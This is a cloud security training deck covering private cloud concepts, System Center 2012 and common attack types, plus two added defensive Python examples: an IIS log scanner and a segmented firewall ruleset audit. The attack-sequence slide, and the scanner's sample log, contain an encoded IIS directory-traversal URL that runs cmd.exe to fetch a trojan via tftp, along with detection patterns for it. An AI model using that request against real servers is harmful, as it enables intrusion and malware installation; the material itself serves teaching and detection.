Securing The Cloud
What is the Cloud? How do you lock it down?

Kevin King - Senior Technical Instructor
Infrastructure/Cloud Consulting | MCT, CCSI, MCSE-Private Cloud, MCSA, MCSA-Server 2012, MCSE, CCNA Data Center
Cisco Quality Instructor 2014
New Horizons CLC | 6700 Jefferson, Building A | Albuquerque, NM 87109
p: 505.830.7100 | f: 505.830.2239 | kking@nhabq.com | www.nhabq.com

1. Introduction to the Private Cloud
2. Securing the Private Cloud

Overview
• Overview of the Cloud Computing Model
• Requirements for the Private Cloud
• Operating a Private Cloud Infrastructure with System Center
• Securing the Cloud

1) Overview of the Cloud Computing Model
• The Advent of Cloud Computing
• Public vs. Private Clouds
• Cloud Service Models
• Methods to Implement the Private Cloud
• System Center 2012 and the Private Cloud

The Advent of Cloud Computing
[Diagram: Client/Server Architecture → Virtualized data center → Cloud Computing]
Advantages of cloud computing include:
• Reduced operational costs
• Server consolidation
• Improved resiliency and agility

Public vs. Private Clouds
Private cloud:
• Provides more control
• Is flexible
• Is customizable
• Has operational and management costs
Public cloud:
• Provides less control
• Provides less flexibility
• Provides less customization
• Reduced operational and management costs

Cloud Service Models
The three cloud service models are:
• Software as a Service (SaaS): includes business processes and applications
• Platform as a Service (PaaS): includes application execution services
• Infrastructure as a Service (IaaS): includes server, storage, and network infrastructure

Methods to Implement the Private Cloud
[Chart: Level of Pre-integration (High to Low) plotted against Deployment Time (Low to High); the three approaches shown are Service Provider, Reference Architecture, and Custom]

System Center 2012 and the Private Cloud
System Center 2012 has the following components:
• App Controller
• Service Manager
• Virtual Machine Manager (VMM)
• Orchestrator
• Operations Manager
• Data Protection Manager (DPM)
• Configuration Manager

2) Requirements for the Private Cloud
• Key Business Requirements
• Service Identification and Onboarding
• Datacenter Administrators and Business Unit IT Administrators

Key Business Requirements
The key business requirements include:
• Competitive advantage
• Scalability
• Reduced cost

Service Identification and Onboarding
• Service Identification:
  • Does the application need to reside in the same location as the data?
  • What computer resources are required?
  • What are the software or operating system requirements?
  • What network bandwidth will be required by the application between the users and the cloud?
• Onboarding:
  • Has the service passed the identity check and is it ready for the cloud?
  • Have relevant backups taken place?
  • Has the migration been tested successfully in a pre-production or UAT environment?
  • Is there a documented method for fallback?
Datacenter Administrators and Business Unit IT Administrators
The datacenter administrator:
• Manages the physical infrastructure
• Manages the private cloud resources
• Configures access to cloud resources
The business unit IT administrator:
• Manages the business unit cloud
• Manages resources specific to the business unit cloud that they own

3) Operating a Private Cloud Infrastructure with System Center
• Provisioning the Private Cloud with Virtual Machine Manager
• Managing Public and Private Clouds with App Controller
• Service Management with Service Manager
• Automating Data Center Processes with Orchestrator

Provisioning the Private Cloud with Virtual Machine Manager
• A simple private cloud is created in Virtual Machine Manager by using the Create Cloud Wizard.

Managing Public and Private Clouds with App Controller
Using the App Controller portal, you can manage private clouds that were created with VMM and public clouds that were created on the Windows Azure platform.

Service Management with Service Manager
Service Manager delivers an integrated platform for automating and adapting IT service management best practices to your organization's requirements.
By using Service Manager, you can:
• Reduce mean time to resolution of issues through a self-service user experience
• Improve private cloud efficiency through centralized management of change processes
• Provide self-service provisioning of private cloud resources
• Implement compliance controls for the management of the private cloud infrastructure

Automating Data Center Processes with Orchestrator
Orchestrator provides a workflow management solution for the data center that allows you to automate the creation, monitoring, and deployment of resources in your environment.
By using Orchestrator, you can:
• Automate processes in your private cloud
• Improve operational efficiency
• Connect different systems from different vendors without knowledge of scripting languages

4) Securing the Private Cloud
• Old days – security = planting two firewalls
• Today – security = very complex problem

Types of Attacks
Including, but not limited to:
• Packet sniffing— An application that uses the promiscuous mode of the network adapter to capture all network packets.
• IP spoofing— An attack in which a hacker assumes the IP address of another host to conceal their true identity.
• Denial-of-service (DoS) attack— Aims to overwhelm a service so as to deny legitimate requests from being serviced. The service may be in the form of bandwidth, memory, or CPU. It is the most well-known of all Internet attacks, and efforts should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following:
  • Code Red
  • Blaster
  • Ping of Death
  • Trinity
• Password attack— As its name implies, this attack intends to acquire passwords to important assets so as to cause further damage. Password attacks can be achieved through other methods previously mentioned, such as IP spoofing, or they can be achieved via brute force.
• Man-in-the-middle attack— This type of attack happens when a hacker manages to position himself between the source and the destination of a network transaction. ARP cache poisoning is one common method.
• Application attack— This type of attack happens when application software holes are exploited to gain access to a computer system. The holes may be bugs or may be TCP port numbers that are exposed.
• Port redirection attack— This type of attack makes use of a compromised host to gain access to a network that is otherwise protected.
• Blue Pilling

Sequence of attacks
• After a phase of probing/scanning, the hacker detects the vulnerability of the web/application server
• The hacker exploits the vulnerability to get a shell
• For example, copying the Trojan onto the web/application server:
  HTTPS://www.example.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe

Server Farm Security Strategies
• Segmenting the Server Farm
• Building the Firewall Ruleset
• From Physical Separation to Logical Separation

Securing The Cloud
Surface area: System Center 2012 has the following components:
• App Controller
• Service Manager
• Virtual Machine Manager (VMM)
• Orchestrator
• Operations Manager
• Data Protection Manager (DPM)
• Configuration Manager

Public vs. Private Clouds
Physical:
• Physical access to equipment
• OOB Management
• Password Policy
• Host Security
Logical:
• System Center Components
• Individual VMs
• Services and Apps
• Passwords/Encryption/Least Privilege
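The example request in the "Sequence of attacks" slide hides the `../` traversal behind an overlong UTF-8 encoding (`%c0%af`) so that a naive string match on the raw URL misses it. The following detector, added here as an example and not part of the deck, shows how a defender can scan IIS W3C log lines for that pattern: it percent-decodes repeatedly (to catch double encoding such as `%255c`), maps overlong encodings of `/`, `\` and `.` to ASCII, folds backslashes, and only then looks for traversal segments, `cmd.exe` references and remote-fetch tokens in the query string. The log lines, field layout and the client addresses are constructed for the example; the attacker URL on the page is reused as one of them.

```python
"""Scan IIS-style W3C log lines for encoded directory traversal and
command-execution attempts. Added example; not from the original deck."""
from __future__ import annotations

import re
from urllib.parse import unquote_to_bytes

# Constructed sample log (fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status).
# Line 2 reuses the request shown on the slide; the others are made up.
SAMPLE_LOG = """\
2014-03-01 10:15:02 198.51.100.7 GET /default.htm - 200
2014-03-01 10:15:09 203.0.113.44 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp%20i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe 200
2014-03-01 10:15:10 203.0.113.44 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 404
2014-03-01 10:16:30 198.51.100.9 GET /images/logo.png - 200
"""

LOG_FIELDS = ("date", "time", "c_ip", "method", "uri_stem", "uri_query", "status")

# Overlong (non-shortest-form) UTF-8 encodings that old IIS builds accepted
# as path separators and dots. Strict UTF-8 decoders reject these, so they
# are mapped by hand after percent-decoding.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\", b"\xc0\xae": b"."}

TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
COMMAND_TOKENS = ("tftp", "/c+", "/c ")  # shell invocation / remote fetch hints


def normalize_path(raw: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), map overlong sequences to ASCII,
    fold backslashes to forward slashes and lower-case the result."""
    data = raw.encode("latin-1", "replace")
    for _ in range(rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for seq, ascii_byte in OVERLONG.items():
        data = data.replace(seq, ascii_byte)
    return data.decode("latin-1").replace("\\", "/").lower()


def inspect_request(uri_stem: str, uri_query: str) -> list[str]:
    """Return a list of finding labels for one request (empty if clean)."""
    findings: list[str] = []
    path = normalize_path(uri_stem)
    if TRAVERSAL.search(path):
        findings.append("traversal")
        # Traversal that only appears after decoding is the evasion case.
        if not TRAVERSAL.search(uri_stem.replace("\\", "/")):
            findings.append("encoded-traversal")
    if "cmd.exe" in path:
        findings.append("cmd.exe")
    query = normalize_path(uri_query)
    if any(tok in query for tok in COMMAND_TOKENS):
        findings.append("remote-command")
    return findings


def scan_log(text: str) -> list[dict]:
    """Parse W3C lines and return an alert record per suspicious request."""
    alerts = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) != len(LOG_FIELDS):
            continue  # malformed line; a real collector would count these
        rec = dict(zip(LOG_FIELDS, fields))
        query = "" if rec["uri_query"] == "-" else rec["uri_query"]
        findings = inspect_request(rec["uri_stem"], query)
        if findings:
            alerts.append({"c_ip": rec["c_ip"], "uri": rec["uri_stem"],
                           "status": rec["status"], "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["c_ip"], alert["status"], alert["uri"], ",".join(alert["findings"]))
```

The status code is carried into the alert on purpose: a traversal request answered with 200 (as in the slide's example) deserves a different priority from the same request answered with 404, and both should feed the host-security and patch checks listed under the logical surface area.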
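The "Server Farm Security Strategies" slide names segmentation and building the firewall ruleset without showing what the ruleset looks like. The following model is an added example (not the deck's material and not any vendor's firewall syntax): zones for the Internet, web, app, database and out-of-band management networks are defined as prefixes, rules are evaluated first-match with an implicit deny, and an audit function flags any allow rule that crosses a zone pair that should never talk directly. A deliberately loose ruleset is included beside the correct one so the audit has something to catch. All addresses, ports and zone names are constructed.

```python
"""Segmented server-farm firewall ruleset with implicit deny and an audit
of forbidden zone pairs. Added example; not from the original deck."""
from __future__ import annotations

from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Constructed zone layout: most-specific prefix wins, so 0.0.0.0/0 is the
# catch-all "internet" zone and the RFC 1918 tiers override it.
ZONES = {
    "internet": ip_network("0.0.0.0/0"),
    "web": ip_network("10.1.10.0/24"),
    "app": ip_network("10.1.20.0/24"),
    "db": ip_network("10.1.30.0/24"),
    "mgmt": ip_network("10.1.250.0/24"),  # out-of-band management network
}


@dataclass(frozen=True)
class Rule:
    src: str           # source zone
    dst: str           # destination zone
    proto: str         # "tcp" or "udp"
    port: int | None   # destination port, None = any
    action: str        # "allow" or "deny"


# Intended ruleset: each tier may only initiate connections to the next tier,
# and only management may reach hosts for administration.
RULESET = [
    Rule("internet", "web", "tcp", 443, "allow"),
    Rule("web", "app", "tcp", 8080, "allow"),
    Rule("app", "db", "tcp", 1433, "allow"),
    Rule("mgmt", "web", "tcp", 3389, "allow"),
    Rule("mgmt", "app", "tcp", 3389, "allow"),
    Rule("mgmt", "db", "tcp", 3389, "allow"),
]

# Same ruleset with one misconfiguration: the database exposed to the Internet.
LOOSE_RULESET = RULESET + [Rule("internet", "db", "tcp", 1433, "allow")]

# Zone pairs that must never be joined by an allow rule (direction matters).
FORBIDDEN = [("internet", "app"), ("internet", "db"), ("web", "db"), ("internet", "mgmt")]


def zone_of(ip: str) -> str:
    """Longest-prefix match of an address against the zone table."""
    addr = ip_address(ip)
    matches = [z for z, net in ZONES.items() if addr in net]
    return max(matches, key=lambda z: ZONES[z].prefixlen)


def evaluate(ruleset: list[Rule], src_ip: str, dst_ip: str,
             proto: str, port: int) -> tuple[str, Rule | None]:
    """First-match evaluation of the initiating direction of a connection.
    Falls through to an implicit deny when no rule matches."""
    src, dst = zone_of(src_ip), zone_of(dst_ip)
    for rule in ruleset:
        if (rule.src == src and rule.dst == dst
                and rule.proto == proto and rule.port in (None, port)):
            return rule.action, rule
    return "deny", None


def audit(ruleset: list[Rule], forbidden: list[tuple[str, str]]) -> list[Rule]:
    """Return allow rules that bridge a forbidden zone pair."""
    return [r for r in ruleset if r.action == "allow" and (r.src, r.dst) in forbidden]


if __name__ == "__main__":
    flows = [("203.0.113.5", "10.1.10.20", "tcp", 443),   # client -> web
             ("203.0.113.5", "10.1.30.20", "tcp", 1433),  # client -> db
             ("10.1.10.20", "10.1.30.20", "tcp", 1433),   # web -> db
             ("10.1.20.20", "10.1.30.20", "tcp", 1433)]   # app -> db
    for f in flows:
        print(f, "->", evaluate(RULESET, *f)[0])
    print("loose ruleset violations:", audit(LOOSE_RULESET, FORBIDDEN))
```

The audit runs against the rule table rather than against traffic, which is the check to add to change control when moving from physical to logical separation: a segment boundary that is only a VLAN or a hypervisor switch is undone by a single careless allow rule, and the table is the place to catch it before deployment.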